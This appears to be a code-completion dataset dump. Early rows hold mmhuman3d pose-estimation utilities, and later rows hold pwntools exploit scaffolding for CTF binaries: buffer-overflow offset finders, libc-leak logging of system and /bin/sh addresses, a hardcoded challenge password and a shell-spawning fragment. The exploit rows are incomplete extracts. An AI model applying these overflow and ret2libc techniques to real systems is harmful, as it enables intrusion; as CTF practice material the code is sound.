id int64 0 190k | prompt stringlengths 21 13.4M | docstring stringlengths 1 12k ⌀ |
|---|---|---|
14,431 | import numpy as np
import torch
from einops.einops import rearrange
from torch.nn import functional as F
The provided code snippet includes necessary dependencies for implementing the `cam_crop2full` function. Write a Python function `def cam_crop2full(crop_cam, center, scale, full_img_shape, focal_length)` to solve the following problem:
convert the camera parameters from the crop camera to the full camera. :param crop_cam: shape=(N, 3) weak perspective camera in cropped img coordinates (s, tx, ty) :param center: shape=(N, 2) bbox coordinates (c_x, c_y) :param scale: shape=(N, 1) square bbox resolution (b / 200) :param full_img_shape: shape=(N, 2) original image height and width :param focal_length: shape=(N,) :return:
Here is the function:
def cam_crop2full(crop_cam, center, scale, full_img_shape, focal_length):
    """convert the camera parameters from the crop camera to the full camera.
    :param crop_cam: shape=(N, 3) weak perspective camera in cropped
    img coordinates (s, tx, ty)
    :param center: shape=(N, 2) bbox coordinates (c_x, c_y)
    :param scale: shape=(N,) square bbox resolution (b / 200)
    :param full_img_shape: shape=(N, 2) original image height and width
    :param focal_length: shape=(N,)
    :return: shape=(N, 3) camera translation (tx, ty, tz) in full-image
        coordinates
    """
    img_h, img_w = full_img_shape[:, 0], full_img_shape[:, 1]
    cx, cy, b = center[:, 0], center[:, 1], scale
    # Effective (scaled) bbox size; epsilon keeps the divisions finite when
    # the predicted weak-perspective scale s is zero.
    bs = b * crop_cam[:, 0] + 1e-9
    # Depth from similar triangles: tz = 2 * f / (b * s).
    tz = 2 * focal_length / bs
    # Shift the crop-space translation by the bbox offset from the image
    # center, rescaled into full-image camera coordinates.
    tx = (2 * (cx - img_w / 2.) / bs) + crop_cam[:, 1]
    ty = (2 * (cy - img_h / 2.) / bs) + crop_cam[:, 2]
    full_cam = torch.stack([tx, ty, tz], dim=-1)
    return full_cam
14,432 | import numpy as np
import torch
from einops.einops import rearrange
from torch.nn import functional as F
def quat_to_rotmat(quat):
    """Convert quaternion coefficients to rotation matrices.

    Args:
        quat: size = [B, 4], ordered as (w, x, y, z); quaternions are
            normalized internally before conversion.
    Returns:
        Rotation matrices corresponding to the quaternions -- size = [B, 3, 3]
    """
    q = quat / quat.norm(p=2, dim=1, keepdim=True)
    w, x, y, z = q[:, 0], q[:, 1], q[:, 2], q[:, 3]
    # Pairwise products used by the standard quaternion-to-matrix formula.
    ww, xx, yy, zz = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
    wx, wy, wz = w * x, w * y, w * z
    xy, xz, yz = x * y, x * z, y * z
    entries = [
        ww + xx - yy - zz, 2 * xy - 2 * wz, 2 * wy + 2 * xz,
        2 * wz + 2 * xy, ww - xx + yy - zz, 2 * yz - 2 * wx,
        2 * xz - 2 * wy, 2 * wx + 2 * yz, ww - xx - yy + zz,
    ]
    return torch.stack(entries, dim=1).view(quat.size(0), 3, 3)
def quaternion_to_angle_axis(quaternion: torch.Tensor) -> torch.Tensor:
    """
    This function is borrowed from https://github.com/kornia/kornia
    Convert quaternion vector to angle axis of rotation.
    Adapted from ceres C++ library: ceres-solver/include/ceres/rotation.h
    Args:
        quaternion (torch.Tensor): tensor with quaternions, ordered (w, x, y, z).
    Return:
        torch.Tensor: tensor with angle axis of rotation.
    Shape:
        - Input: :math:`(*, 4)` where `*` means, any number of dimensions
        - Output: :math:`(*, 3)`
    Example:
        >>> quaternion = torch.rand(2, 4) # Nx4
        >>> angle_axis = tgm.quaternion_to_angle_axis(quaternion) # Nx3
    """
    if not torch.is_tensor(quaternion):
        raise TypeError('Input type is not a torch.Tensor. Got {}'.format(
            type(quaternion)))
    if not quaternion.shape[-1] == 4:
        raise ValueError(
            'Input must be a tensor of shape Nx4 or 4. Got {}'.format(
                quaternion.shape))
    # unpack input and compute conversion
    q1: torch.Tensor = quaternion[..., 1]
    q2: torch.Tensor = quaternion[..., 2]
    q3: torch.Tensor = quaternion[..., 3]
    # |v| = sin(theta/2), w = cos(theta/2) for a unit quaternion.
    sin_squared_theta: torch.Tensor = q1 * q1 + q2 * q2 + q3 * q3
    sin_theta: torch.Tensor = torch.sqrt(sin_squared_theta)
    cos_theta: torch.Tensor = quaternion[..., 0]
    # atan2 with flipped signs when w < 0 keeps the recovered angle in the
    # canonical range (same rotation, shortest representation).
    two_theta: torch.Tensor = 2.0 * torch.where(
        cos_theta < 0.0, torch.atan2(-sin_theta, -cos_theta),
        torch.atan2(sin_theta, cos_theta))
    # k scales the vector part into an axis-angle vector; near zero rotation
    # sin(theta/2) -> 0, so fall back to the small-angle limit k = 2.
    k_pos: torch.Tensor = two_theta / sin_theta
    k_neg: torch.Tensor = 2.0 * torch.ones_like(sin_theta)
    k: torch.Tensor = torch.where(sin_squared_theta > 0.0, k_pos, k_neg)
    angle_axis: torch.Tensor = torch.zeros_like(quaternion)[..., :3]
    angle_axis[..., 0] += q1 * k
    angle_axis[..., 1] += q2 * k
    angle_axis[..., 2] += q3 * k
    return angle_axis
def rotation_matrix_to_quaternion(rotation_matrix, eps=1e-6):
    """
    This function is borrowed from https://github.com/kornia/kornia
    Convert 3x4 rotation matrix to 4d quaternion vector
    This algorithm is based on algorithm described in
    https://github.com/KieranWynn/pyquaternion/blob/master/pyquaternion/quaternion.py#L201
    Args:
        rotation_matrix (Tensor): the rotation matrix to convert.
    Return:
        Tensor: the rotation in quaternion, ordered (w, x, y, z).
    Shape:
        - Input: :math:`(N, 3, 4)`
        - Output: :math:`(N, 4)`
    Example:
        >>> input = torch.rand(4, 3, 4) # Nx3x4
        >>> output = tgm.rotation_matrix_to_quaternion(input) # Nx4
    """
    if not torch.is_tensor(rotation_matrix):
        raise TypeError('Input type is not a torch.Tensor. Got {}'.format(
            type(rotation_matrix)))
    if len(rotation_matrix.shape) > 3:
        raise ValueError(
            'Input size must be a three dimensional tensor. Got {}'.format(
                rotation_matrix.shape))
    # if not rotation_matrix.shape[-2:] == (3, 4):
    #     raise ValueError(
    #         'Input size must be a N x 3 x 4 tensor. Got {}'.format(
    #             rotation_matrix.shape))
    rmat_t = torch.transpose(rotation_matrix, 1, 2)
    # Numerically-stable (Shepperd-style) extraction: each quaternion
    # component can be recovered from a different diagonal combination t_i;
    # the masks below select, per batch element, the branch whose t_i is
    # largest so no division by a near-zero value occurs.
    mask_d2 = rmat_t[:, 2, 2] < eps
    mask_d0_d1 = rmat_t[:, 0, 0] > rmat_t[:, 1, 1]
    mask_d0_nd1 = rmat_t[:, 0, 0] < -rmat_t[:, 1, 1]
    # Branch 0: dominant x component (t0 = 4x^2).
    t0 = 1 + rmat_t[:, 0, 0] - rmat_t[:, 1, 1] - rmat_t[:, 2, 2]
    q0 = torch.stack([
        rmat_t[:, 1, 2] - rmat_t[:, 2, 1], t0,
        rmat_t[:, 0, 1] + rmat_t[:, 1, 0], rmat_t[:, 2, 0] + rmat_t[:, 0, 2]
    ], -1)
    t0_rep = t0.repeat(4, 1).t()
    # Branch 1: dominant y component.
    t1 = 1 - rmat_t[:, 0, 0] + rmat_t[:, 1, 1] - rmat_t[:, 2, 2]
    q1 = torch.stack([
        rmat_t[:, 2, 0] - rmat_t[:, 0, 2], rmat_t[:, 0, 1] + rmat_t[:, 1, 0],
        t1, rmat_t[:, 1, 2] + rmat_t[:, 2, 1]
    ], -1)
    t1_rep = t1.repeat(4, 1).t()
    # Branch 2: dominant z component.
    t2 = 1 - rmat_t[:, 0, 0] - rmat_t[:, 1, 1] + rmat_t[:, 2, 2]
    q2 = torch.stack([
        rmat_t[:, 0, 1] - rmat_t[:, 1, 0], rmat_t[:, 2, 0] + rmat_t[:, 0, 2],
        rmat_t[:, 1, 2] + rmat_t[:, 2, 1], t2
    ], -1)
    t2_rep = t2.repeat(4, 1).t()
    # Branch 3: dominant w component (t3 = 4w^2, the usual trace branch).
    t3 = 1 + rmat_t[:, 0, 0] + rmat_t[:, 1, 1] + rmat_t[:, 2, 2]
    q3 = torch.stack([
        t3, rmat_t[:, 1, 2] - rmat_t[:, 2, 1],
        rmat_t[:, 2, 0] - rmat_t[:, 0, 2], rmat_t[:, 0, 1] - rmat_t[:, 1, 0]
    ], -1)
    t3_rep = t3.repeat(4, 1).t()
    # Exactly one mask is true per batch element; combine the candidates and
    # normalize by q_i / (2 * sqrt(t_i)).
    mask_c0 = mask_d2 * mask_d0_d1
    mask_c1 = mask_d2 * ~mask_d0_d1
    mask_c2 = ~mask_d2 * mask_d0_nd1
    mask_c3 = ~mask_d2 * ~mask_d0_nd1
    mask_c0 = mask_c0.view(-1, 1).type_as(q0)
    mask_c1 = mask_c1.view(-1, 1).type_as(q1)
    mask_c2 = mask_c2.view(-1, 1).type_as(q2)
    mask_c3 = mask_c3.view(-1, 1).type_as(q3)
    q = q0 * mask_c0 + q1 * mask_c1 + q2 * mask_c2 + q3 * mask_c3
    q /= torch.sqrt(t0_rep * mask_c0 + t1_rep * mask_c1 + # noqa
                    t2_rep * mask_c2 + t3_rep * mask_c3)  # noqa
    q *= 0.5
    return q
def projection(pred_joints, pred_camera, iwp_mode=True):
    """Project 3D points on the image plane based on the given camera info.

    Identity rotation and Weak Perspective (IWP) camera is used when
    iwp_mode = True.

    Args:
        pred_joints: (B, J, 3) 3D joint positions.
        pred_camera: dict holding 'cam_sxy', a (B, 3) weak-perspective
            camera (s, tx, ty).  # assumes this layout -- TODO confirm
        iwp_mode: use the fixed-intrinsics weak-perspective model.

    Returns:
        Projected 2D keypoints, as produced by ``perspective_projection``.

    Raises:
        NotImplementedError: if ``iwp_mode`` is False.
    """
    batch_size = pred_joints.shape[0]
    if not iwp_mode:
        raise NotImplementedError
    cam_sxy = pred_camera['cam_sxy']
    # Recover a camera translation from (s, tx, ty) assuming a 224 px crop
    # and a 5000 px focal length; 1e-9 guards against division by zero.
    pred_cam_t = torch.stack([
        cam_sxy[:, 1], cam_sxy[:, 2], 2 * 5000. /
        (224. * cam_sxy[:, 0] + 1e-9)
    ],
                             dim=-1)
    # Fix: allocate the camera center on the same device/dtype as the joints;
    # the original created it on the CPU, breaking GPU inference.
    camera_center = torch.zeros(
        batch_size, 2, device=pred_joints.device, dtype=pred_joints.dtype)
    pred_keypoints_2d = perspective_projection(
        pred_joints,
        rotation=torch.eye(3).unsqueeze(0).expand(batch_size, -1, -1).to(
            pred_joints.device),
        translation=pred_cam_t,
        focal_length=5000.,
        camera_center=camera_center)
    return pred_keypoints_2d
The provided code snippet includes necessary dependencies for implementing the `compute_twist_rotation` function. Write a Python function `def compute_twist_rotation(rotation_matrix, twist_axis)` to solve the following problem:
Compute the twist component of given rotation and twist axis https://stackoverflow.com/questions/3684269/component-of-a-quaternion-rotation-around-an-axis Parameters ---------- rotation_matrix : Tensor (B, 3, 3,) The rotation to convert twist_axis : Tensor (B, 3,) The twist axis Returns ------- Tensor (B, 3, 3) The twist rotation
Here is the function:
def compute_twist_rotation(rotation_matrix, twist_axis):
    '''
    Compute the twist component of given rotation and twist axis
    https://stackoverflow.com/questions/3684269/component-of-a-quaternion-rotation-around-an-axis
    Parameters
    ----------
    rotation_matrix : Tensor (B, 3, 3,)
        The rotation to convert
    twist_axis : Tensor (B, 3,)
        The twist axis
    Returns
    -------
    twist_rotation : Tensor (B, 3, 3)
        The twist rotation
    twist_angle : Tensor (B, 1)
        The signed twist angle about the axis
    '''
    quaternion = rotation_matrix_to_quaternion(rotation_matrix)
    # Normalize the axis; epsilon guards against a zero-length axis.
    twist_axis = twist_axis / (
        torch.norm(twist_axis, dim=1, keepdim=True) + 1e-9)
    # Swing-twist decomposition: project the quaternion's vector part onto
    # the twist axis and keep w, then renormalize to a unit quaternion.
    projection = torch.einsum('bi,bi->b', twist_axis,
                              quaternion[:, 1:]).unsqueeze(-1) * twist_axis
    twist_quaternion = torch.cat([quaternion[:, 0:1], projection], dim=1)
    twist_quaternion = twist_quaternion / (
        torch.norm(twist_quaternion, dim=1, keepdim=True) + 1e-9)
    twist_rotation = quat_to_rotmat(twist_quaternion)
    twist_aa = quaternion_to_angle_axis(twist_quaternion)
    # The axis-angle vector is parallel to twist_axis, so the ratio of the
    # component sums recovers the signed angle magnitude.
    twist_angle = torch.sum(
        twist_aa, dim=1, keepdim=True) / torch.sum(
            twist_axis, dim=1, keepdim=True)
    return twist_rotation, twist_angle
14,433 | import argparse
import copy
import os
import os.path as osp
import time
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import get_dist_info, init_dist
from mmhuman3d import __version__
from mmhuman3d.apis import set_random_seed, train_model
from mmhuman3d.data.datasets import build_dataset
from mmhuman3d.models.architectures.builder import build_architecture
from mmhuman3d.utils.collect_env import collect_env
from mmhuman3d.utils.logger import get_root_logger
def parse_args():
    """Parse command-line arguments for the training tool.

    Also propagates ``--local_rank`` into the ``LOCAL_RANK`` environment
    variable when it is not already set (needed by distributed launchers).
    """
    parser = argparse.ArgumentParser(description='Train a model')
    parser.add_argument('config', help='train config file path')
    parser.add_argument('--work-dir', help='the dir to save logs and models')
    parser.add_argument(
        '--resume-from', help='the checkpoint file to resume from')
    parser.add_argument(
        '--no-validate',
        action='store_true',
        help='whether not to evaluate the checkpoint during training')
    # device / gpus / gpu-ids are mutually exclusive ways to pick hardware.
    group_gpus = parser.add_mutually_exclusive_group()
    group_gpus.add_argument('--device', help='device used for training')
    group_gpus.add_argument(
        '--gpus',
        type=int,
        help='number of gpus to use '
        '(only applicable to non-distributed training)')
    group_gpus.add_argument(
        '--gpu-ids',
        type=int,
        nargs='+',
        help='ids of gpus to use '
        '(only applicable to non-distributed training)')
    parser.add_argument('--seed', type=int, default=None, help='random seed')
    parser.add_argument(
        '--deterministic',
        action='store_true',
        help='whether to set deterministic options for CUDNN backend.')
    parser.add_argument(
        '--options', nargs='+', action=DictAction, help='arguments in dict')
    parser.add_argument(
        '--launcher',
        choices=['none', 'pytorch', 'slurm', 'mpi'],
        default='none',
        help='job launcher')
    parser.add_argument('--local_rank', type=int, default=0)
    args = parser.parse_args()
    if 'LOCAL_RANK' not in os.environ:
        os.environ['LOCAL_RANK'] = str(args.local_rank)
    return args
14,434 | import argparse
import os
import time
import mmcv
import numpy as np
import torch
from mmhuman3d.core.conventions.keypoints_mapping import convert_kps
from mmhuman3d.core.evaluation import keypoint_mpjpe
from mmhuman3d.core.visualization.visualize_smpl import visualize_smpl_pose
from mmhuman3d.data.data_structures.human_data import HumanData
from mmhuman3d.models.registrants.builder import build_registrant
def parse_args():
    """Parse command-line arguments for the mmhuman3d smplify tool."""
    parser = argparse.ArgumentParser(description='mmhuman3d smplify tool')
    parser.add_argument(
        '--input',
        help=('input file path.'
              'Input shape should be [N, J, D] or [N, M, J, D],'
              ' where N is the sequence length, M is the number of persons,'
              ' J is the number of joints and D is the dimension.'))
    parser.add_argument(
        '--input_type',
        choices=['keypoints2d', 'keypoints3d'],
        default='keypoints3d',
        help='input type')
    parser.add_argument(
        '--J_regressor',
        type=str,
        default=None,
        help='the path of the J_regressor')
    parser.add_argument(
        '--keypoint_type',
        default='human_data',
        help='the source type of input keypoints')
    parser.add_argument('--config', help='smplify config file path')
    parser.add_argument('--body_model_dir', help='body models file path')
    parser.add_argument('--batch_size', type=int, default=None)
    parser.add_argument('--num_betas', type=int, default=10)
    parser.add_argument('--num_epochs', type=int, default=1)
    parser.add_argument(
        '--use_one_betas_per_video',
        action='store_true',
        help='use one betas to keep shape consistent through a video')
    parser.add_argument(
        '--device',
        choices=['cpu', 'cuda'],
        default='cuda',
        help='device used for smplify')
    parser.add_argument(
        '--gender',
        choices=['neutral', 'male', 'female'],
        default='neutral',
        help='gender of SMPL model')
    parser.add_argument('--output', help='output result file')
    parser.add_argument(
        '--show_path', help='directory to save rendered images or video')
    parser.add_argument(
        '--overwrite',
        action='store_true',
        help='Whether to overwrite if there is already a result file.')
    args = parser.parse_args()
    return args
14,435 | import argparse
import os
from mmhuman3d.data.data_converters import build_data_converter
# Registry of dataset-preprocessing converters, keyed by the CLI name accepted
# by --datasets.  Each value is an mmcv-style config dict consumed by
# build_data_converter; 'modes' selects the splits to convert and 'prefix'
# the sub-directory under the data root.
DATASET_CONFIGS = dict(
    agora=dict(
        type='AgoraConverter', modes=['train', 'validation'], fit='smplx'),
    amass=dict(type='AmassConverter', prefix='AMASS_file'),
    coco=dict(type='CocoConverter'),
    coco_wholebody=dict(
        type='CocoWholebodyConverter', modes=['train', 'val'], prefix='coco'),
    crowdpose=dict(
        type='CrowdposeConverter', modes=['train', 'val', 'test', 'trainval']),
    pw3d=dict(type='Pw3dConverter', modes=['train', 'test']),
    mpii=dict(type='MpiiConverter'),
    h36m_p1=dict(
        type='H36mConverter',
        modes=['train', 'valid'],
        protocol=1,
        mosh_dir='data/datasets/h36m_mosh',
        prefix='h36m'),
    h36m_p2=dict(
        type='H36mConverter', modes=['valid'], protocol=2, prefix='h36m'),
    mpi_inf_3dhp=dict(type='MpiInf3dhpConverter', modes=['train', 'test']),
    penn_action=dict(type='PennActionConverter'),
    lsp_original=dict(type='LspConverter', modes=['train'], prefix='lsp'),
    lsp_dataset=dict(type='LspConverter', modes=['test']),
    lsp_extended=dict(type='LspExtendedConverter', prefix='lspet'),
    up3d=dict(
        type='Up3dConverter', modes=['trainval', 'test'], prefix='up-3d'),
    posetrack=dict(type='PosetrackConverter', modes=['train', 'val']),
    instavariety_vibe=dict(type='InstaVibeConverter', prefix='vibe_data'),
    eft=dict(
        type='EftConverter', modes=['coco_all', 'coco_part', 'mpii', 'lspet']),
    coco_hybrik=dict(type='CocoHybrIKConverter', prefix='coco/train_2017'),
    pw3d_hybrik=dict(type='Pw3dHybrIKConverter', prefix='hybrik_data'),
    h36m_hybrik=dict(
        type='H36mHybrIKConverter',
        modes=['train', 'test'],
        prefix='hybrik_data'),
    mpi_inf_3dhp_hybrik=dict(
        type='MpiInf3dhpHybrIKConverter',
        modes=['train', 'test'],
        prefix='hybrik_data'),
    surreal=dict(
        type='SurrealConverter', modes=['train', 'val', 'test'], run=0),
    spin=dict(
        type='SpinConverter',
        modes=['coco_2014', 'lsp', 'mpii', 'mpi_inf_3dhp', 'lspet'],
        prefix='spin_data'),
    vibe=dict(
        type='VibeConverter',
        modes=['pw3d', 'mpi_inf_3dhp'],
        pretrained_ckpt='data/checkpoints/spin.pth',
        prefix='vibe_data'),
    gta_human=dict(type='GTAHumanConverter', prefix='gta_human'),
    humman=dict(
        type='HuMManConverter', modes=['train', 'test'], prefix='humman'),
    cliff=dict(type='CliffConverter', modes=['coco', 'mpii']))
def _str2bool(value):
    """argparse type for boolean options: accepts true/false, yes/no, 1/0.

    The original used ``type=bool``, which treats every non-empty string
    (including 'False') as True.
    """
    if isinstance(value, bool):
        return value
    lowered = value.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('invalid boolean value: %r' % (value, ))


def parse_args():
    """Parse command-line arguments for the dataset-conversion tool."""
    parser = argparse.ArgumentParser(description='Convert datasets')
    parser.add_argument(
        '--root_path',
        type=str,
        required=True,
        help='the root path of original data')
    parser.add_argument(
        '--output_path',
        type=str,
        required=True,
        help='the path to store the preprocessed npz files')
    parser.add_argument(
        '--datasets',
        type=str,
        nargs='+',
        required=True,
        default=[],
        help=f'Supported datasets: {list(DATASET_CONFIGS.keys())}')
    parser.add_argument(
        '--enable_multi_human_data',
        # Fix: ``type=bool`` made any non-empty string truthy, so passing
        # 'False' enabled the option; parse the string explicitly instead.
        type=_str2bool,
        default=False,
        help='Whether to generate a multi-human data')
    args = parser.parse_args()
    return args
14,436 | import argparse
import subprocess
from datetime import date
import torch
def parse_args():
    """Parse CLI arguments: input and output checkpoint filenames."""
    parser = argparse.ArgumentParser(
        description='Process a checkpoint to be published')
    parser.add_argument('in_file', help='input checkpoint filename')
    parser.add_argument('out_file', help='output checkpoint filename')
    args = parser.parse_args()
    return args
14,437 | import argparse
import subprocess
from datetime import date
import torch
def process_checkpoint(in_file, out_file):
    """Strip training-only state from a checkpoint and publish it.

    Loads *in_file*, removes the optimizer state (smaller file), saves the
    result to *out_file*, then renames it to
    ``<out_file minus .pth>-<sha8>_<YYYYMMDD>.pth`` where sha8 is the first
    8 hex characters of the file's SHA-256.
    """
    checkpoint = torch.load(in_file, map_location='cpu')
    # remove optimizer for smaller file size
    if 'optimizer' in checkpoint:
        del checkpoint['optimizer']
    # if it is necessary to remove some sensitive data in checkpoint['meta'],
    # add the code here.
    torch.save(checkpoint, out_file)
    sha = subprocess.check_output(['sha256sum', out_file]).decode()
    if out_file.endswith('.pth'):
        out_file_name = out_file[:-4]
    else:
        out_file_name = out_file
    date_now = date.today().strftime('%Y%m%d')
    final_file = out_file_name + f'-{sha[:8]}_{date_now}.pth'
    # Fix: wait for the rename to complete and surface failures; the original
    # used fire-and-forget Popen, so the function could return before the
    # published file existed.
    subprocess.check_call(['mv', out_file, final_file])
14,438 | import sys
import os
from PyQt6.QtCore import pyqtSignal
from PyQt6.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox
from PIL import Image, ImageFont, ImageQt
from handright import Template, handwrite
from threading import Thread
from ui import *
def getfile():
    """Show an "Open file" dialog and return the chosen path ('' if cancelled)."""
    # getOpenFileName returns (path, selected_filter); only the path is needed.
    q = QFileDialog.getOpenFileName()
    return q[0]
14,439 | import sys
import os
from PyQt6.QtCore import pyqtSignal
from PyQt6.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox
from PIL import Image, ImageFont, ImageQt
from handright import Template, handwrite
from threading import Thread
from ui import *
def savefile():
    """Show a "Save file" dialog and return the chosen path ('' if cancelled)."""
    # getSaveFileName returns (path, selected_filter); only the path is needed.
    q = QFileDialog.getSaveFileName()
    return q[0]
14,440 | import os
import sys
import click
import subprocess
import tempfile
import itertools as IT
import select
from time import sleep
def uniquify(path, sep = ''):
    """Return a unique variant of *path* in the same directory.

    Tries the exact name first, then ``<name><sep>_0``, ``<sep>_1``, ... until
    an unused name is found (via a temporarily patched tempfile candidate
    sequence).  The probe file created by mkstemp is removed, so only the
    name is returned -- note this is inherently racy.

    NOTE(review): relies on CPython's private tempfile internals
    (``_name_sequence``, ``_once_lock``); may break on other
    implementations or future versions.
    """
    def name_sequence():
        count = IT.count()
        yield ''
        while True:
            yield '{s}_{n:d}'.format(s = sep, n = next(count))
    orig = tempfile._name_sequence
    with tempfile._once_lock:
        tempfile._name_sequence = name_sequence()
    try:
        path = os.path.normpath(path)
        dirname, basename = os.path.split(path)
        filename, ext = os.path.splitext(basename)
        fd, filename = tempfile.mkstemp(dir = dirname, prefix = filename, suffix = ext)
        os.close(fd)  # fix: the original leaked this file descriptor
        os.remove(filename)
    finally:
        # Fix: always restore the global sequence, even if mkstemp raises;
        # the original left tempfile permanently patched on error.
        tempfile._name_sequence = orig
    return filename
14,441 | import os
import sys
import click
import subprocess
import tempfile
import itertools as IT
import select
from time import sleep
def shouldRun():
    """Give the user a one-second window to cancel the analysis.

    Returns True when nothing was typed on stdin within the timeout,
    False when any input is pending (user pressed a key).
    """
    click.secho('Will run analysis in 1 second, press any key to cancel', fg='green')
    # select() returns the subset of fds that are readable within 1 second.
    i, o, e = select.select( [sys.stdin], [], [], 1 )
    if (i):
        return False
    else:
        return True
14,442 | from pwn import *
gdbscript = '''
init-pwndbg
break main
'''.format(**locals())
exe = './shooting_star'
def start(argv=[], *a, **kw):
    """Launch ./shooting_star locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,443 | from pwn import *
exe = './shooting_star'
# NOTE(review): these info() calls reference ROP/libc addresses that are
# computed elsewhere in the original exploit script.
info("%#x pop_rdi", pop_rdi)
info("%#x pop_rsi_r15", pop_rsi_r15)
info("leaked got_write: %#x", got_write)
info("libc_base: %#x", libc_base)
info("system_addr: %#x", system_addr)
info("bin_sh: %#x", bin_sh)
def find_ip(payload):
    """Crash the target with a cyclic *payload* and return the saved-RIP offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('>', '1')
    p.sendlineafter('>>', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,445 | from pwn import *
exe = './shooting_star'
# NOTE(review): the addresses below are computed elsewhere in the original
# exploit script.
info("%#x pop_rsi_r15", pop_rsi_r15)
info("leaked got_write: %#x", got_write)
info("libc_base: %#x", libc.address)
def find_ip(payload):
    """Crash the target with a cyclic *payload* and return the saved-RIP offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('>', '1')
    p.sendlineafter('>>', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,446 | from pwn import *
gdbscript = '''
init-pwndbg
break main
continue
'''.format(**locals())
exe = './blacksmith'
def start(argv=[], *a, **kw):
    """Launch ./blacksmith locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,447 | from pwn import *
gdbscript = '''
init-pwndbg
breakrva 0x0000131f
continue
'''.format(**locals())
exe = './batcomputer'
def start(argv=[], *a, **kw):
    """Launch ./batcomputer locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,448 | from pwn import *
exe = './batcomputer'
# NOTE(review): stack_addr is leaked elsewhere in the original exploit script.
info("leaked stack_addr: %#x", stack_addr)
def find_ip(payload):
    """Crash ./batcomputer with a cyclic *payload* and return the saved-RIP offset."""
    p = process(exe)
    p.sendlineafter('>', '2') # Chase joker
    p.sendlineafter('Enter the password:', 'b4tp@$$w0rd!') # Enter password
    p.sendlineafter('Enter the navigation commands:', payload) # Cyclic pattern
    p.sendlineafter('>', '420') # Enter invalid option to trigger return
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,449 | from pwn import *
gdbscript = '''
init-pwndbg
piebase
breakrva 0x1438
continue
'''.format(**locals())
exe = './nightmare'
def start(argv=[], *a, **kw):
    """Launch ./nightmare locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,451 | from pwn import *
# NOTE(review): the lines below are a scrambled fragment of the original
# exploit script; ``exe`` and ``start()`` are defined elsewhere in it, and
# the statement order here reflects the extraction, not the original flow.
io = process(exe)
menu_option = '1'
io = start()
menu_option = '2'
menu_option = '1'
io.send('1')
io.recv()
io.sendline('2')
io.recv()
io.sendline('sh')
io.interactive()
def send_payload(payload):
    """Send *payload* through the currently selected menu option and return the reply line."""
    io.sendlineafter('>', menu_option)
    io.sendlineafter('>', payload)
    io.recvuntil('> ')
    return io.recvline().strip()
14,452 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './vuln'
def start(argv=[], *a, **kw):
    """Launch ./vuln locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,453 | from pwn import *
exe = './vuln'
def find_ip(payload):
    """Crash ./vuln with a cyclic *payload* and return the saved-RIP offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter(b'>', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,454 | from pwn import *
gdbscript = '''
init-pwndbg
piebase 0x40c0
continue
'''.format(**locals())
exe = './pwnshop'
def start(argv=[], *a, **kw):
    """Launch ./pwnshop locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,455 | from pwn import *
exe = './pwnshop'
# NOTE(review): the addresses below are computed elsewhere in the original
# exploit script.
info("leaked_address: %#x", leaked_addr)
info("pie_base: %#x", elf.address)
info("got_puts: %#x", got_puts)
info("libc_base: %#x", libc_base)
info("system_addr: %#x", system_addr)
info("bin_sh: %#x", bin_sh)
def find_ip(payload):
